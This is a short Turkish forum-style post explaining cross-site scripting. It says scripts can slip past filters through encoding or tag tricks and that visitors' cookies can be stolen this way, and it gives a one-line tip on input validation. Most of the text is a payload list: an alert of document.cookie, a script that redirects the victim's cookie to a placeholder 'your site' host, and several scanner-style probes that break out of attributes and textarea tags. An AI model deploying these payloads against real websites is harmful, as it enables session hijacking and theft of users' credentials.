Xss'i Anlayalım
Temelde XSS hep bu mantıkla çalışmaktadır. Kendi scriptinizi karşıdakinin görebileceği şekilde sitede çalıştırmanız gerekir. Bazen filtreleme bile yapılsa bu scriptler çalıştırılabilir. Bir çok escape fonksiyonu, encoding veya taglardaki karakterlerle oynama yoluyla scriptleri karşı tarafa geçirmek mümkün olmaktadır.
Bu sayede bu linke tıklayan yada linki/kodu bir şekilde gören kullanıcıların cookie bilgisi ele geçirilebilir.
XSS açıkları e-mail sitelerinde en çok rastlanılan güvenlik açığıdır. Çünkü bir çok web uygulamasında rastlanılır ve ücretsiz açık tarama programları ile çok rahat bulunabilir. Web uygulamasının kullanıcıdan aldığı girdiler, her zaman kontrolden geçirilmelidir. Bu aynı zamanda "Sql injection", "Buffer Overflow" gibi saldırıları da engelleyecektir.
<script>alert(document.cookie);</script>
<script>document.location='http://www.sizinsiteniz.com/xss/?'+escape(document.cookie)</script>
<script>alert('wvs-xss-magic-string-${random}');</script>
'><script>alert('wvs-xss-magic-string-${random}');</script>
"><script>alert('wvs-xss-magic-string-${random}');</script>
><script>alert('wvs-xss-magic-string-${random}');</script>
</textarea><script>alert('wvs-xss-magic-string-${random}'); </script>
<script>var%20wvs_xss_test_variable=${random};alert(wvs_xss_test_variable);</script>
><script>var%20wvs_xss_test_variable=${random};alert(wvs_xss_test_variable);</script>
</textarea>var%20wvs_xss_test_variable=${random};alert(wvs_xss_test_variable) ;</script>
><script>alert('wvs-xss-magic-string-${random}');</script>
anlatım cümle ve anlatım bütünlüğü açısından alıntılarla desteklenmiştir.
Hit: 5356
Yazar: amele_2